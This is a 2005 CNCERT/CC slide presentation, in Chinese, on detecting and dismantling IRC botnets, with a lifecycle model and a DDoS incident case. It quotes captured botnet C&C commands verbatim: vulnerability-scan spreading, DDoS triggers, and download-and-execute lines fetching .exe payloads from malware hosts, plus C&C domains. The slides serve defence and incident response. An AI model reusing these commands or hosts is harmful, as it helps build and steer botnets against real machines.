CNCERT/CC 关于僵尸网络的应对措施

CNCERT/CC关于僵尸网络的应对措施 国家计算机网络应急技术处理协调中心陈明奇博士 2005年11月17日天津

摘要第一部分背景第二部分发现和处置第三部分 CNCERT/CC的工作 • 监测情况和活动规律 • 应对措施第四部分实际案例分析

一背景 网络安全的传统三大威胁： • 病毒/木马/蠕虫（Virus/Trojan/Worm） • 拒绝服务攻击（DoS/DDoS） • 垃圾邮件（Spam）黑客——动机的改变： • 以经济利益为驱动，不再追求轰动性效果带来的名声和炫耀技巧 ———组织的改变： • 由单打独斗转向有组织的活动主要的新威胁： • 网络仿冒—钓鱼陷井，防不胜防 • 间谍软件—明修栈道，暗渡陈仓 • 垃圾信息—指哪发哪，带宽垃圾 • 僵尸网络—黑色军团，一呼百应

如何应对这些新威胁？ • 网络仿冒—APWG • 间谍软件—VENDER(MS, AV company) • 垃圾信息—尚未引起重视，将无所盾形 • 僵尸网络—越来越严重，越来越多的人在谈论 • 趋势科技 TrendLabs在“2004年9月病毒感染分析报告”中指出，个人计算机成为任人摆布的僵尸计算机的机率，相较于去年9月成长23.5倍。 • 2004年出现的Korgo系列、GaoBot系列、SdBot系列蠕虫组成的BotNet可接受控制者指令，实施许多网络攻击行动。 • 3月爆发的Witty蠕虫，Caida怀疑该蠕虫利用BotNet散发，因为其初始感染计算机数目超过100台。 • 2004年10月网络安全机构 SANS表示，僵尸计算机已被黑客当作用来勒索的工具，若要避免服务器因 DoS 而瘫痪的代价是付给黑客4万美金。 • 2004年11月，根据反网钓工作小组（APWG）的安全专家观察,网络钓鱼（Phishing）的技术愈来愈高明，现在骗徒可运用受控僵尸系统（BotNet）来扩大网钓范围，坐等受害者上钩。 • 2004年，美国最大的家庭宽带ISP Comcast被发现成为互联网上最大的垃圾邮件来源，Comcast的用户平均每天发送的8亿封邮件中，有88％是使用存在于Comcast内的BotNet发送的垃圾邮件。，

Botnet——网络安全界的新挑战 目前仍未得到有效遏制： • 3.6 cents per bot week • 6 cents per bot week • September 2004 postings to SpecialHam.com, Spamforum.biz >20-30k always online SOCKs4, url is de-duped and updated every >10 minutes. 900/weekly, Samples will be sent on request. >Monthly payments arranged at discount prices. • 2004年7月英国路透社的报导，有一个由青少年人组成的新兴行业正盛行：「出租可由远程恶意程序任意摆布的计算机」，这些受控制的计算机称之为”僵尸（Zombie）”计算机。数目小自10部大到3万部，只要买主愿意付钱，它们可以利用这些僵尸网络(BotNet)，进行垃圾邮件散播、网络诈欺(phishing)、散播病毒甚至拒绝服务攻击，代价仅需每小时100美元。问题：如何发现僵尸网络？到底僵尸网络在干什么？如何捣毁僵尸网络？ >$350.00/weekly - $1,000/monthly (USD) >Type of service: Exclusive (One slot only) >Always Online: 5,000 - 6,000 >Updated every: 10 minutes

二、僵尸网络的发现和处置 IRC僵尸网络的发现一、蜜罐（Honeypot) 例子：“honeynet project”项目二、IDS+IRC协议解析：例子：863－917网络安全监测平台三、BOT行为特征： • 快速加入型bot • 长期连接型 bot • 发呆型bot 例子：DdoSVax项目

IRC僵尸网络发现方法比较

僵尸网络的处置 知己知彼： • 控制服务器信息：域名或IP、端口（port）、连接密码 (如果有)； • 频道信息: 频道名（channel）、频道密码(如有)； • 控制密码、编码规则和Host 控制者发送密码到频道中，用于标识身份，常以.login pass的形式出现。编码规则和是否启用host认证是bot程序实现的，不体现在网络通信中。 • Bot支持的命令集主要功能，包括认证、升级和自删除类的命令，比如！login、.update、.download、.uninstall等。

僵尸网络的处置 一、擒贼先擒王——模拟控制者，对僵尸网络进行完全控制最终解决办法：直接找到控制服务器，需要授权或用户配合： • 方法1：发送更新命令(吃毒丸) ； • 方法2：发送自删除命令 (集体自杀)； • 条件：掌握控制者身份认证信息二、釜底抽薪——切断用户主机和控制服务器的联系： • 方法1：网络边界上阻断C&C通信条件：掌握控制服务器的准确信息 • 方法2：取消域名，无法解析;条件：得到授权三、攘外必先安内——清除用户终端上的Bot程序，打补丁： • 手工查杀 • 专杀工具或升级杀毒程序问题：如何发现BOT?

三、CNCERT/CC的工作 • 我们发现了什么？ • 每两天一次报告Top 5，6月3日至9月19日，发现较大规模僵尸网络59个，平均每天发现3万个僵尸网络客户端 • 这些僵尸网络不断扫描扩张、更新版本、下载间谍软件和木马、发动各种形式的拒绝服务攻击。例如： • hotgirls网络，客户端数量最多时达到29624个。频道主题都是： • ipscan s.s.s.s dcom2 86400 256 8000 –s（利用dcom漏洞传播，客户端bot保持沉默） • * wormride -s -t * download http://blah.alam2909.1paket.com/df.exe c:\windows\defrag32.exe -e –s(下载df.exe保存为defrag32并悄悄执行)

僵尸网络情况统计(2005年6月3日-6月 23日) • IRC C&C Server 分布: 34个 • 美国:18; 韩国:5; 中国:4; 瑞典:2; 意大利:2; 日本：1;挪威: 1; 香港 :1.

发现一个客户端规模超过15万的僵尸网络(2005年8月19日－9月19日)发现一个客户端规模超过15万的僵尸网络(2005年8月19日－9月19日)

发现了控制黑客的线索(2005年8月29日) 发现一昵称为gunit的用户曾经登陆该网络并向多个频道发送控制命令，命令为扫描某种漏洞。如下。红色部分和样本的活动吻合。8月29日 12点 PRIVMSG #asnftp :.login booties -s;cmd=:gunit!DIE@dark.acid.xPRIVMSG #nesebot :.login nesebot -s;cmd=:gunit!DIE@nesePRIVMSG #urxbot :.login prx -s;cmd=:gunit!DIE@prx.net; TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunit;TOPIC #.asnftp :.advscan asn1smb 100 3 0 -r -s;cmd=:gunit;TOPIC #.ForBotX.# :.adv.start lsass 120 5 9999 -b -r -s;cmd=:gunitTOPIC #forasn :.adv.start asn 120 5 0 -r;cmd=:gunit; TOPIC #phat# :.scan.startall;cmd=:gunit; TOPIC #urxbot :.advscan dcom135 500 3 0 -r;cmd=:gunit;

僵尸网络的生命周期(Life Cycle) 一、僵尸网络的产生（botnet creation)其他传播手段：垃圾邮件、社会工程学蠕虫创建僵尸网络：Deloder/Mytob/Zotob僵尸网络创建新的僵尸网络：2005.9.18 9:00332 [botz]-96018 #ass :!upd4t3z http://peckno.site.voila.fr/win2k.exe the [botz]-96018连接到 67.43.*.*:6667 并加入 JOIN #suce fuck. 然后，接收新命令：:r00t.expl01t3d.org 332 Suce-548836 #suce :-ntscan 254 1000 -a –b于是，一个新的僵尸网络就在开始形成

僵尸网络的生命周期(Life Cycle) 二、僵尸网络的扩散（botnet spread） TOPIC ##asn-new## :.advscan asn1smb 400 3 0 -r -b –s TOPIC #bitch :+advscan Asn1smbnt 199 5 0 201.x.x.x -r –s TOPIC #xdcc4 :@sadvscan asn1smb 150 5 0 201.5.x.x TOPIC #XOwneD :!ntscan 350 1000 -a -b; TOPIC #111 :.advscan lsass_445 100 5 120 -r 332 nffe #fanta :.scan pnp 50 6000 221 332 … #bot :$advscan WksSvcOth 400 5 0 221.x.x.x -b -r; 332 … #tvr0x :^advscan dcom135 300 5 0 -r –s 332 … #Rxx :.asc -S -s!.ntscan 40 5 0 -b -r -e -h!.asc PnP 40 10 0 -b -r -e -h! 332 ...#r00x %advscan dcom135 300 5 0 -r -b –s 332 ...#asn :.scanall –s 332 ...#.wadside :`adv.start lsass 150 6 9999 -b -r –s 332 ...#.pwnt. :.xscan msass 300 5 0 -b -s; 332 ...#.#smash3r#.# :.root.start msass 200 0 5 -a -r –s 332 ...##scarezsql## :-scan.startall!-bot.secure -s!-scan.addnetrange x.x.x.x/16 100

僵尸网络的生命周期(Life Cycle) 三、僵尸网络的迁移（botnet transfer） 1. IRC Server变换物理主机(待发现实例) 2. IRC Server逻辑变换：动态域名，指向同一主机;克隆，创建一个新的线程连接到新的服务器和频道 3. IRC Server内部迁移有的Bot会从一个频道迁移到另一频道。为达到这个目的，仅仅需要修改原始频道的主题即可。2005年9月27日发现的实例如下。

僵尸网络的生命周期(Life Cycle) • 四、僵尸网络的升级（botnet update） • Bot文件升级：通过TOPIC或 PRIVMSG • 2005.9.18 8.am • :Nos!W0ot@pizzownage.edu TOPIC #hb3 :.hell.download • http://elizabethwargo.com/cannon/php1/images/duh.exe explore.exe -e;cmd=; • TOPIC #rooted :@sdownload http://site.voila.fr/qhzteam/asn.exe • PRIVMSG ##em :!upadfkadf http://w00tage.com/stolen2.exe stolen • Bot 模块升级：增加或减少相应模块 • 2005年09月19日 02点NotaBot: • PRIVMSG #NotaBot :.spread.remove.module mssql\r\n • PRIVMSG #NotaBot :.spread.remove.module dcom1\r\n • PRIVMSG #NotaBot :.spread.add.module vnc_scan\r\n • PRIVMSG #NotaBot :.spread.add.module radmin_empty\r\n

僵尸网络的生命周期(Life Cycle) 五、僵尸网络的活动（Botnet Activity）发动拒绝服务攻击、下载spyware、窃取信息、扫描扩散等等。 22005年09月19日 12点 PRIVMSG #NotaBotslog :[ VNC Found ] :218.14. *.*:111111 //发现新的VNC简单密码 PRIVMSG #NotaBot: Active Modules : ms04011 ipc wins netdde veritas vnc_scan radmin_empty //所具备的扫描漏洞的模块 0927日 20 TOPIC ##bla :.ddos.random 81.169. *.* 80 120 //发动拒绝服务攻击

僵尸网络的生命周期(Life Cycle) 六、僵尸网络的消亡（Botnet decease） 1、C&C servers不可连接人为因素或其他因素(网络配置)：DDNS /DNS无法解析 2、C&C server配置错误，bot无法加入 3、用户清除了bot 4、升级防病毒产品 5、控制者或安全专家发出删除指令( .remove/.uninstall) 6、bot间彼此争夺客户端控制权

CNCERT/CC如何应对？ 1 自2004年12月起，利用863-917网络安全监测平台，监测IRC BotNet。 2 加强对IRC BotNet实际危害的监测和发现：2005年7月份建设Honeypot。 3 加强对涉及BotNet事件的处理力度，利用积累的数据研究其活动规律，如“僵尸网络生命周期” 4 在网站上加强对BotNet危害的宣传力度,为公众提供有关流行Bot的信息和解决方案。 5 搜集互联网上流行的Bot类恶意代码样本,联合其他应急组织、安全厂商，加大研究分析力度，发布安全工具。 6 积极配合有关部门,打击制作传播利用Bot的犯罪分子。

四、案例介绍：DDOS僵尸网络 事件处理过程（一）：发现 1）接到用户报警：大量的持续的拒绝服务攻击，带宽被严重占用。网络讹诈？ 2）按照DDOS的处理流程，找到一台攻击主机，发现木马程序。 BotNet？

事件处理过程（二） (二) 代码分析：BKDR_VB.CQ木马扫描功能；上传\下载文件功能；服务端版本升级；获得服务端操作系统版本及语言，处理器型号信息，url信息； HTTP； SMTP； …

事件处理过程（二） (二) 代码分析——IRC控制服务器使用动态域名 anthony.ipv6.usr.aswind.com peter.freehost.aswind.net carlyle.dns2go.aswind.net khond.vip.vhost.ourmidi.com lamen.vhost.ourmidi.com massuse.ipv6.free.ourmidi.net bruce.free.ourmidi.net john.usr.aswind.com

事件处理过程（二） 动态域名解析后得到IP地址及相应源端口 216.152.*.* 6667 美国 212.204.*.* 6667 荷兰 64.12.*.* 6667 美国 207.68.*.* 6667 美国 61.197.*. * 8000 日本 218.157. *. * 443 韩国 221.146. *. * 554 韩国 219.153. *. * 8000 重庆市攻击源（202.108.*.*）会接收来自这八个IP地址发出的攻击指令进行攻击。

事件处理过程（三） (三)重庆控制节点采集数据在主机所有者的配合下，对BotNet和黑客的动作进行跟踪。 • 截止到12曰10日受到该肇事者控制的攻击机大约有60000多台；受到重庆控制机控制的攻击机有8000多台，当时处于活动状态的有3712台。 • 定位黑客：IP地址为－60.2.*.*，河北某ADSL用户

(四) 网络监测抽样监测及监测数据分析 1、共计发现171641个IP地址被植入BKDR_VB.CQ木马，其中大陆境内156120台。事件处理过程(四)

事件处理过程(四) 2、境外，共计15521台(2004年12月13日至2005年1月10日)

事件处理过程(五) 向政府部门报告 • 信息产业部 • 国家信息化工作小组办公室安全组 • 公安部 CNCERT/CC配合公安机关迅速行动

事件处理过程(六) (六) 帮助终端用户清除BotNet木马程序 1、在CNCERT网站上免费提供了我们组织研制的查杀有关木马的工具 http://www.cert.org.cn/articles/tools/common/2004123022037.shtml 2、发挥反病毒和个人防火墙厂商的作用，升级产品。

事件处理过程(六) 3、总体活动趋势

事后回顾：Botnet的形成 将msapp.exe升级为rasinf.exe, rasinf.exe中内置四个控制指令（进行IPC漏洞扫描和Kuang2木马扫描）用于控制“僵尸网络”自动传播木马程序。 2 通过编写 “kuang2”木马客户端程序(k2.exe)控制互联网上大量被植入“kuang2”木马的主机，并将msapp.exe投放到这些主机中. 1 2002年，掌握一万多台受控主机升级rasinf.exe,并最终形成ipxsrv.exe木马程序。ipxsrv.exe木马程序的主要传播方式是利用了社会工程学的方法,通过“QQ尾巴病毒诱使用户访问某个恶意页面,当存在IE漏洞的用户访问该恶意页面时会被自动植入ipxsrv.exe, 掌握超过三万台受控主机 3 到2004年10月份，掌握超过五万台受控主机

应对僵尸网络需要共同努力 1 运营商：配合僵尸网络的发现和处置，尤其是C&C Server的处置。 2 安全厂商：交换和共享Bot样本和特征；代码分析的技术。 3 应急组织：交换僵尸网络信息，尤其是C&C Server信息；实际案例；处置经验和合作。 4 科研单位：加强对僵尸网络的发现和处置的研究力度，提高技术能力。 5 单位用户：提高安全意识；及时报告涉及botnet事件；积极配合处置。

我们的策略 国内：打造精兵，组成联军国际：交流信息，促进合作 CNCERT/CC： WEBSITE: WWW.ORG.CN TEL: 8299 0999 (国内) +86-10-8299 1000（国际） EMAIL:cncert@cert.org.cn

谢谢！ www.cert.org.cn cmq@cert.org.cn

CNCERT/CC 关于僵尸网络的应对措施